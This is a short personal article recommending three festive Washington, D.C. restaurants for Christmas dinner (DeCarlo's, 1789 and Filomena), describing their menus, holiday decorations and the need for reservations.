Top Christmas dinner ideas

Family meals around the holidays can be joyous, or seriously stressful. Going to a restaurant is always a fun and easy alternative to trying to prepare a large meal at home. Here are the best three places to eat out over Christmas break:

DeCarlo’s: Located in AU park, DeCarlo’s was the restaurant where my family traditionally ate every Christmas Eve. The menu has something for everyone, from soup and pasta to seafood and salad. The breadsticks on each table are almost as good as their main courses. The environment is very classy and festive during the holidays, and the main room has its own Christmas tree. Lastly, the dessert menu is top notch. One dish that I recommend if you decide to go is the Mozzarella Caprese.

1789: This restaurant is a great, but more upscale option for family dinner. It’s namesake is based on the year that Georgetown University was founded, hence its location in Georgetown. The menu is American Fare, my favorite menu being the Cauliflower & Parmesan Ravioli. The historic townhouse has multiple dining rooms that are covered in garlands and ribbons during Advent. Aside from great food, 1789 is also known to be a popular place for engagements.

Filomena: This restaurant in Georgetown is like that one house in the neighborhood that always goes overboard with the holiday lights. Cramped with wreaths, hanging decorations, and a giant Christmas tree in the very center, Filomena is a seriously festive option for family dinner. The menu is Italian and offers a large variety of pastas. The portions are large enough that it’s possible to split one dish between two people. Filomena is often crowded, so it’s best to make a reservation a week or two in advance when planning. Overall, the food is always good and the restaurant always has a fun atmosphere and location.
